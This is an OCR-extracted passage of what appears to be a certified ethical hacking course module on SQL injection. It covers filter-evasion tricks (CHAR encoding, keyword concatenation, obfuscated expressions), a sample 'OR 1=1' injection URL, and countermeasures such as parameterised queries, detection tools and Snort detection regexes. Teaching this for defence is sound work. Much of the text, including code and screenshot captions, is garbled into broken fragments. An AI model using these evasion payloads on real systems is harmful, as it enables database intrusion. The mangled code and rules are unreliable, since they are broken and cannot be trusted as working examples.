E v a sio n T e c h n iq u e : C h a r E n c o d in g
To evade IDSs/lPSs, attackers use Char()function to inject SQL injection statements
(lo a d _ f ile (c h a r
u n io n
fro m
u sers
w h ere
lo g in
c h a r (1 1 4 ,111, 111,116)
1=(
)O ch ar
(39 , 39)
, 1, 0)
) ;
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
. ) SEL
O r a c le :1;
( + } ECTUS ( + }
im m e d ia t e
ER
s e l
( > }
,ec
t u s
(O
e
)0
r
ex e c u t e
, : O /i ..
TABLE
<
LE
ex ec
: +
( d r o +
AB
,
p t
: + :
PT
+ ':
DRO
(( \*
M S SQ L: ' ;
ab + , l e )
(H A
N O ) INSE ( + RTUS ( O / \ + 1
er
u s
> :
MYSQL: ;
e x e c u t e
co n cat
( in
s e
, r t
&
E v a s io n T e c h n iq u e : S trin g C o n c a te n a tio n
The SQL engine builds a single string from multiple pieces so the attacker, with the help of concatenation, breaks up identifiable keywords to evade intrusion detection systems. Concatenation syntaxes may vary from database to database. Split instructions to avoid signature detection by using execution commands that allow concatenating text in a database server.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Split instructions to avoid signature detection by using execution commands that a llo w to concatenate text in a database server
....................................... SELECT......
SEL
ECTUS
ER
>
O racle : ;
exec ute
i m m e d ia t e
el
ect
u s
1 1
||
,e
............................
........................... ............................
TABLE
.*/.../. . .v .,
+ 'L E ')
............
.,...JSJr
/ INSERT USER
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Obfuscated "qwerty"
Examples of obfuscated codes for the string "qw erty":
Reverse(concat(if(1, char(121), 2),0x74, right(left(0x567210, 2),1), lower(mid( T E S T 2,1)),replace(0x7074, 'pt','wf),char(instr(123321, 33)+110))) Concat(unhex(left(crc32(31337),3)-400), unhex(ceil(atan(1)*100-2)), unhex(round(log(2)*100)-4), char(114), char(right(cot(31337),2)+54), char(pow(11, 2)))
E v a sio n T e c h n iq u e : O b fu s c a te d C o d e s
Attackers obfuscate code so that they are not recognized by the intrusion detection system.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le F lo w
So far, we have discussed various concepts and topics that help you penetrate the web application or network to test for SQL vulnerabilities. Now we will discuss the countermeasures to be applied to protect web applications against SQL injection attacks. A countermeasure is an act or method, device, or system that can be used to avoid the side effects of vulnerabilities and malicious events that can in turn compromise the assets of an organization or computer in a network. This can be a response to defend the negative event.
Evasion Techniques
( r-
Countermeasures
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Monitor DB traffic using an IDS, WAP Database server runs OS commands Use low privileged account for DB connection
Error message revealing important information Suppress all error .....messages Filter All Client Data
{=*)
H o w to D e f e n d A g a i n s t S Q L I n j e c t i o n A t t a c k s
Implementing consistent coding standards, minimizing privileges, and firewalling the
M in im iz in g P riv ile g es
Developers generally neglect security aspects while creating a new application, and tend to leave those matters to the end of the development cycle. However, security matters should be a priority, and adequate steps must be incorporated during the development stage itself. It is important to create a low-privilege account first, and begin to add permissions only as they are needed. The benefit to addressing security early is that it allows developers to address security concerns as features are added, so they can be identified and fixed easily. In addition, developers become much more familiar with the security framework, if they are forced to comply with it throughout the project's lifetime. The payoff is usually a more secure product that does not require the last minute security scramble that inevitably occurs when customers complain that their security policies do not allow applications to run outside of the system administrator's context.
a product should be carried out. Apart from this, a set of standards and policies with which every developer must comply should be laid down. Take, for example, a policy for performing data access. Developers are generally allowed to use whatever data access method they like. This usually results in a multitude of data access methods, each exhibiting unique security concerns. A more prudent policy would be to dictate certain guidelines that guarantee similarity in each developer's routines. This consistency would greatly enhance both the maintainability and security of the product, provided the policy is sound. Another useful coding policy is to ensure that all input validation checks are performed on the server. Although it is sometimes a performance technique to carry out data entry validation on the client, since it minimizes round-trips to the server, it should not be assumed that the user is actually conforming to that validation when they post information. In the end, all input validation checks should occur on the server.
of
o )~
most web environments, the only hosts that need to connect to SQL Server are the administrative network (if one is there) and the web server(s) that it services. Typically, SQL Server needs to connect only to a backup server. SQL Server 2000 listens by default on named pipes (using Microsoft networking on TCP ports 139 and 445) as well as TCP port 1433 and UDP port 1434 (the port used by the SQL Slammer" worm). If the server lockdown is good enough, it should be able to help mitigate the risk of the following: Q e 9 Developers uploading unauthorized/insecure scripts and components to the web server Misapplied patches Administrative errors
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Test the size and data type of input and enforce appropriate limits to prevent buffer overruns
6 Test the content of string variables and accept only expected values
- Reject entries that contain binary data, escape sequences, and comment characters
Never build Transact-SQL statements directly from user input and use stored procedures to validate user input
6 Implement multiple layers of validation and never concatenate user input that is not validated
H o w to D e f e n d A g a i n s t S Q L I n j e c t i o n A t t a c k s ( C o n t d)
Attackers use SQL injections to gain unauthorized access into the system or network. The following things should be done to defend against SQL injection attacks. a Make no assumptions about the size, type, or content of the data that is received by your application. e Test the size and data type of input and enforce appropriate limits to prevent buffer overruns. Q Q Q Test the content of string variables and accept only expected values. Reject entries that contain binary data, escape sequences, and comment characters. Never build Transact-SQL statements directly from user input and use stored procedures to validate user input. Q Implement multiple layers of validation and never concatenate user input that is not validated.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
(rtifwd
CEH
ithiul UthM
En fo rce T y p e and len g th ch e ck s using P a ra m e te r C o lle c tio n so th a t inp u t is tre a te d as a literal va lu e instead o f ex ecu tab le cod e
conn);
myCommand.SelectCommand.Command T y p e = C o m m a n d T y p e .StoredProcedure; SqlParameter parm = m y C o m m a n d . S e l e c t C o m m a n d . P a r a m e t e r s . A d d ("@aut_id", S q l D b T y p e .VarChar, 11); parm.Value = Login.Text; In this example, the and length.
@ a u t_ id
param eter is treated as a literal value instead o f as executable code. This value is checked fo r type
*
Login.Text +
V ulnerab le Code
Secure Code
S q lDataAdapter m y C o m m a n d = new SqlDataAdapter( "SELECT aut_lname, aut_fname FROM Authors WHERE a u t_id = 0aut_id", c o n n ) ; SQLParameter p a r m = m y C o m m a n d . S e l e c t C o m m a n d .P a rameters.Add ("@aut_id", SqlDbType.VarChar, 11); Parm.Value = Login.Text; Copyright by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
Use type-safe SQL parameters with stored procedures or dynamically constructed SQL command strings. Various parameter collections provide type checking and length validation. For example, a SQL parameter collection can be used. Type and length checks can be enforced using a Parameter Collection. Consider the following example in which input "@ au t_id " is treated as a literal value instead of executable code.
S q l D a t a A d a p t e r m yCom m and = n e w S q lD a ta A d a p te r ( " A u t h L o g in " , c o n n );
= L o g in .T e x t ;
The @aut_id value is checked for type and length. Example of Vulnerable and Secure Code: This code is vulnerable to SQL injection
S q l D a t a A d a p t e r m yCom m and = + L o g i n . T e x t + " ' 11, c o n n ) ; new S q lD a t a A d a p t e r ( " L o g in S t o r e d P r o c e d u r e
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
'n.
I N
Operating System SQL Query Custom Error Page
H o w to D e f e n d A g a i n s t S Q L I n j e c t i o n A t t a c k s
To defend against SQL injection attacks, you can follow the countermeasures stated in the previous section and you can use type-safe SQL parameters as well. To protect the web server, you can use W AF firewall/IDS and filter packets. You need to constantly update the software using patches to keep the server up-to-date to protect it from attackers. Sanitize and filter user input, analyze the source code for SQL Injection, and minimize the use of third-party applications to protect the web applications. You can also use stored procedures and parameter queries to retrieve data and disable verbose error messages, which can guide the attacker with some useful information, and use custom error pages to protect the web applications. To avoid SQL injection into the database, connect using non-privileged accounts and grant least privileges to the database, tables, and columns. Disable commands such as xp_cmdshell, which can affect the OS of the system.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
SQL Injection
http://juggvb0Y.c0m/7id:blah' OR 1*1
Q
Log in Form
....................
Internet Connect to the Database using non-privileged account Use WAF Firewall/IDS and filter packets Web Server
Attacker
<..............................I | I K
DBMS Grant least privileges to the database, tables, and colum ns Web Application M inim ize Use of 3 rd Party A pps
-i
'V r f f H
Li
ILfe
7 h
Operating System
SQL Query FIG U R E 14.28: H ow to Defend Against SQ L Injection Attack
C ustomError Page
S Q L I n j e c t i o n D e t e c t i o n T o o l: M ic ro so ft S o u rc e C o d e A n a ly z e r
J
CEH
Microsoft Source Code Analyzer for SQL Injection is a static code analysis tool for finding SQL Injection vulnerabilities in ASP code It scans ASP source code and generates warnings related to first order and second order SQL Injection vulnerabilities
http://www.m icrosoft.com Copyright by EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited.
S Q L I n j e c t i o n D e t e c t i o n T o o l: M i c r o s o f t S o u r c e C o d e A n a ly z e r
Source: http://www.microsoft.com The Microsoft Source Code Analyzer for SQL Injection tool is a static code analysis tool that helps you find SQL injection vulnerabilities in Active Server Pages (ASP) code. It scans ASP source code and generates warnings related to first order and second order SQL injection vulnerabilities.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
m
\
| A-P fJHI Dot1r*5^< |
Drectory Secirty | HTTP Headers 1 Custom Errcrs Servte Web 51c | Performance ISAPIFIters | Heme Dieclory
The fdlo/ihg flltes are active for al Web sites on thfc computer ard *cited in Ihe orda loted bebw. Ttrse filter j ore visbfc cnl/ from ths crcpe'ty pop?/ cannot to viewed on th3 croporty poqos of irttlsidual web atos if 11 1 31 if it if 1. can o n icali: 1, allo w high bit ! . el le v dots th at 1, renavB " S e rv e r ' 1. log UrlScan a c t iv it y 1. the Url50an l o j ore tv header (: ftle 111 n o con o to m PID ( l e
12 10 11= 1
A 1 lo w D o tIn P ath * 0 R e ro v eS er ver Hea cl er 0 E u a b l a lo g g i n g 1 P erP rcc essL o g rjri n -1 1 U rlS c a n 123 lc r jj A ilo v L a tu S o a n n im 0
U R I
. I f RenoveServerHeader in 0, I hen Al. tern teSBrvr . ud to s p e c ify a xeplacenent lo r I I S ' s b u ilt A Itorn at oSnrvorHan^
c t f o c t iv e i f
CCS MS J e 1/141
Co: 1
http://www.m icrosoft.com
.n * Y 1 T 0 A p*1.
Copyright by IG-GMMCil. All Rights Reserved. Reproduction is Strictly Prohibited.
S Q L I n j e c t i o n D e t e c t i o n T o o l: M i c r o s o f t U r l S c a n F ilte r
Source: http://www.microsoft.com UrlScan is a security tool that restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, the UrlScan security tool helps prevent potentially harmful requests from reaching the server.
21*1
Drectory 5ear*y | HTTP Header* | CustomErrors | 5erv*e | ASP.NET Web Site | Performance I5APIF#ers | Home Drectory | Doanwtt* The fakxitng f te is are active for al Web s*es on th s corrputer and executed m the order Isted below. These Nters are v*rble only from this property p9, and cannot be v>ev*ed on the property pages of ndrodual Web sfces
OK
C y rr i
>*>
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
S Q L I n j e c t i o n D e t e c t i o n T o o l: d o t D e f e n d e r
Source: http://www.applicure.com W eb Application Security dotDefender is the software W eb Application Firewall (W AF). DotDefender boasts enterprise-class security and advanced integration capabilities. It inspects the HTTP/HTTPS traffic for suspicious behavior. It detects and blocks SQL injection attacks.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
dotDefender -[dotDefender (329 days left)\Default Security Profile (Protection)\Pattems\SQL Injection\Best Practices] hie Action View Favorites Window Help
^ jej xj
I *!IB
S U] E ve n tV ie w e r (L o c a l) In te rn e tInfo rm a b o nS e rv ic e s( O L ic e n s e G lo b a lS e ttin g s B D e fa u ltS e c u rityP ro file(P ro te c g] S e rv e rM a s k in g g] U p lo a dF o ld e rs B ) P a tte rn s B 2W h ite lis t(P e rm itte dA c c B g jP a ra n o id B 2 )E n c o d in g B 2 )B u ffe rO v e rflo w B 2SQLInjection ) U s e rD e fin e d
Best Practices
d tD efender
SQL Injection
Choose which type of SQL Injection attacks to intercept.
0 0 0 D
B 2Cross-SiteScripting B 2 )C o o k ieM a n ip u la tio n w Classic SQL Comment B P a thTra v e rs a l B 2 )P ro b in g B 2 )R e m o teC o m m a n dE x e c Comments B * )C o d eIn je c tio n B idW in d o w sD ire c to rie sa n B 2 )X M LS c h e m a 1 7 Uni Union S elect Statem ent B 2 )X P a thIn je c tio n B * )X P a thC ro s sS iteS c rip ti B S ig n a tu re s 1 7 Select Version Statem ent (U s eD e fa u lt) A th e n aF TPS ite(U s eD e fa u lt)
1 7 SQL CHAR Type 1 7 SQL SYS Commands 1 7 IS_SRVROLEMEMBER followed by ( 1 7 MS SQL Specific SQL Injection
Pattern = Pattern
Q Q
J
F IG U R E 14.31: d o tD efen d er Screensho t
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
D 1
Is s u e s T a s k s
b it
id B a n e r ts2 2 & 2 2 H T T PR e a jo bS a r t3 7 1 S
3 4 S a a j *tun
#9 f 1 : ., j
DS
'jD c x oL c a r a e
O a a ib a ic a rrv ?* k x
http://www.ibm .com Copyright by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
S Q L I n j e c t i o n D e t e c t i o n T o o l: I B M S e c u r i t y A p p S c a n
Source: http://www.ibm.com IBM Security AppScan Standard detects, analyzes, and remediates web application
vulnerabilities to help prevent security breaches and enable compliance. It delivers the expertise and critical application lifecycle management and security platform integrations necessary to empower enterprises to not just identify application vulnerabilities but also reduce overall application risk.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Scan
o o j tm y P 1 4o
Pause Manual Eplc*e Configuration Report Find Scan 109
IM
IM
(n o
look
tM i
gowerTools
e0
Data tssues
Tasks
1 2
4 ^
Sunty O H 9 h * ' O o a n
Aranged & > Save? Oaacantog
8 a u aX.. 1 f *m ,
d/(D
retp
A 34 Security ls*ye < 124 vanar*^ tor Hip demc *s4/e net' t 41 Cross-Site Scopting 4 p O DOM Bated Crow-Sue Scnptvtg 3) p y Poison Null Byte Windows Fdas Retrieval SQL njection ' O http.Vdemoteslf we.net/subscnbeasp # MEmatl Cros1-5< te Requesl Forgery Director, Idling |i) Imfc Injection (facilitates Cross S*e Request Forgery) Open Redirect (2) Phishing Through Frames (2) Database Error Pattern Found (2) Email Address Pattern Found in Parameter Value Hdden Directory Detected Microsoft ASP NET Debugging Enabled 2) Missmg HttpOnly Attribute m SHO" Cook* Application Error 2) Application Test Script Detected 1 1 t JH Email Address Pattern Found Possible Server Path Disclosure Pattern Found
SQL Injection
N ft povjM r to wre*. mnrfcfy or ontm-. and y> HttpV/demo testfirc-net/subscribe.aspa tatEmail
O" * 9 <
O p <)1(
O> * ()
JO comment asp* 5 1 jfl defaultas) drsdaimer htm :4( ^ feedback p : ( -jj Ngh^Kd_1 r*ve$tmen$.htm j notfcund asp saarchasp 1 3 ( jg securtyJtm servererroratp ) * ! ( jg subtcrbejspi f7( ^ tubicrbtnrf J survey.Questions*spa
1 (
Test Response
cdiv 13*.*wrapper* 3ty:e*w1dth: ft%;* cdie c:a-arr* tyie-v 1tfth: #%;"> cbl>An Error la Ocearrt4(^t> <IU>S J B 1ry:</U>
< p><t x xpas 1d*_eti0_C< * te a t ta lc o r c a a iitM l. e o ' </apaax/bx/p> < ii> Erto : Nt1119e:</U>
tV S I vtf)
t1 0 1
'!
: Ib lS
1 arv*>Syetax r r r c r : 1 la f r y express!:
o Ganwta 22C.-22?
\y1D
JL >
t Dane Lear
j i u bo tcamr^ Sd corH*1 *c
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
I
Scan Site GET - Q
Scar URL Gj Q
htrp:.'.'1a002/reax!me' Scan Current Site Stan Current URL Scan Multi-Site Reset/Clear Scannei Import
Export
9 -R e d H c n e
& Reeer^Tod Q CookieTool . C o d e T o i StongTool .n. VtoMjt
j kjjenripjyia
f X r / * K X * e
io jovsco ITc
f lU oR ,* *
flb c u
1.3 3 1 3
>1
UR./Rr URL
!
tayWord/AotonURL
<
OEQEEBQ
S Q L I n j e c t i o n D e t e c t i o n T o o l: W e b C r u i s e r
Source: http://sec4app.com
WebCruiser is a web vulnerability scanner that allows you to scan any website for web vulnerabilities such as SQL injection, cross-site scripting, XPath injection, etc. Features: Q Vulnerability Scanner: SQL injection, cross-site scripting, XPath injection, etc. Q SQL Injection Scanner Q SQL Injection Tool: GET/Post/Cookie Injection POC (Proof of Concept) Q SQL Injection for SQL Server, MySQL, DB2, Oracle, etc.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
J
Q Scan Site | GET ^ * Q Scan URL Q Q
B r o w s e r Q Scanner http://10.0.0.2/realhome/
Report
^ S e tt in g
WebBrowser Scan Current Site Scan Current URL Scan Multi-Site Reset/Clear Scanner Import Export Viinerab*tyScanner jqueiytipsy js 3 POQProof Of Concep L. DD_belatedPNG_0.0 8a mrjs 3 SQL Injection E3 Real Home j ~ Cro*8 S*e Scriptin [ Web Resource axd?d UsZWynrfl2bbhcKOspArMr3RD90bowxoXwl03RaXPwR nq1 PbAWpf7hOM9iuOkgHOy1lHVWV OqG _ ft AdministrationEntr. j- Web Resource axd ^ SystemTool 1 Login aspx | Resend Tool i index.aspx : E CookieTooJ _ CodeTool ! jquery triggerjs & = StrmgTool E coda-slider [ ^ Settings jquey.scrolTo-1.3.3js fdg Report - About J2 L
81
<:
URL/Refer URL
Q lhttp://10.002/real1ome/Logr aspxAButton2 Lo
O http://10.002/RealHome/logri aspx/ 'Bu(lon2 L
Type
KeyWord/Action URL
Vulnerability L INJECT
< n
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
f c ii ?
/ e x e c (\ s | \ + ) + (s |x )p \ w + / ix
/ ( < \ % 2 7 ) | ( \ 1) ) u n i o n / i x
ix
a le r t -
tc p
$EXTER NAL_N ET
any
>
$HTTP_SERVERS
$HTTP_PORTS
(m s g :" S Q L
In je c t io n
http://www .snort.org Copyright by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
S n o r t R u l e to D e t e c t S Q L I n j e c t i o n A t t a c k s
Source: http://www.snort.org Snort rules are very useful in detecting SQL injections. Apart from detecting SQL injection attacks, Snort also sends an alert or logs the intrusion attempt. Snort uses signature, protocol-, and anomaly-based detection methods. Block these expressions in SNORT
/ (\ % 2 7 ) | ( V ) | (\ - \ - ) | ( \% 2 3 ) | ( # ) / i x / e x e c (\ s |\ + )+ (s |x )p \ w + / ix / ( ( \ % 2 7 ) | ( \ ' ) ) u n io n / ix / \ w * ( (\ % 2 7 ) | ( \ ' ) ) ( (\ % 6 F ) |o | ( \ % 4 F ) ) ( (\ % 7 2 ) | r | ( \ % 5 2 ) ) / i x a le r t tc p $EXTERN A L_N ET any -> $ H TTP_SERVERS $ H TTP_PO RTS (m s g :"S Q L In je c tio n P a r a n o id "; f l o w : t o _ s e r v e r , e s t a b l i s h e d ; u r i c o n t e n t . p i " ; p c r e : " / (\%27) | ( V ) | (\-\) | (% 2 3 ) | ( # ) / i " ; c l a s s t y p e : W e b - a p p l i c a t i o n - a t t a c k ; s i d : 9 0 9 9 ; r e v : 5 ; )
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
SQLDict
h ttp ://n tse cu rity.r
HP Scrawlr
https ://h30406. www3. hp.com
/ v
SQL I n j e c ti o n D e te c tio n T o o ls
\
The following are some more SQL injection detection tools that can be used for detecting SQL injection vulnerabilities: 0 0 0 0 HP Weblnspect available at http://www.hpenterprisesecurity.com SQLDict available at http://ntsecuritv.nu HP Scrawlr available at https://h30406.www3.hp.com SQL Block Monitor available at http://sql-tools.net
Acunetix W eb Vulnerability Scanner available at http://www.acunetix.com 0 0 0 0 0 GreenSQL Database Security available at http://www.greensql.com Microsoft Code Analysis Tool .NET (CAT.NET) available at http://www.microsoft.com NGS SQuirreL Vulnerability Scanners available at http://www.nccgroup.com W SSA - W eb Site Security Scanning Service available at http://www.beyondsecurity.com N-Stalker W eb Application Security Scanner available at http://www.nstalker.com
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le S u m m a ry
SQL injection is the most com m on website vulnerability on the Internet that takes advantage of non-validated input vulnerabilities to pass SQL com mands through a W e b application for execution by a backend database
Threats of SQL injection include authentication bypass, information disclosure, and data integrity and availability com prom ise
Database admins and w eb application developers need to follow a methodological approach to detect SQL injection vulnerabilities in w eb infrastructure that includes m anual testing, function testing, and fuzzing
SQL injection is broadly categorized as simple and blind; simple SQL injection is further categorized as UN IO N and error-based SQL injection
Pen testers and attackers need to follow a com prehensive SQL injection m ethodology and use autom ated tools such as BSQ LHacker for successful injection attacks
M ajo r SQ L injection counterm easures involve input data validation, error message suppression or customization, proper DB access privilege m anagem ent, and isolation of databases from underlying OS
M o d u le S u m m a ry
9 SQL injection is the most common website vulnerability on the Internet
that takes advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. Threats of SQL injection include authentication bypass, information disclosure, and data integrity and availability compromise. Q Database admins and web application developers need to follow a methodological approach to detect SQL injection vulnerabilities in web infrastructure that includes manual testing, function testing, and fuzzing. Q SQL injection is broadly categorized as simple and blind; simple SQL injection is further categorized as UNION and error-based SQL injection. e Pen testers and attackers need to follow a comprehensive SQL injection methodology and use automated tools such as BSQLHacker for successful injection attacks. 9 Major SQL injection countermeasures involve input data validation, error message suppression or customization, proper DB access privilege management, and isolation of databases from the underlying OS.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.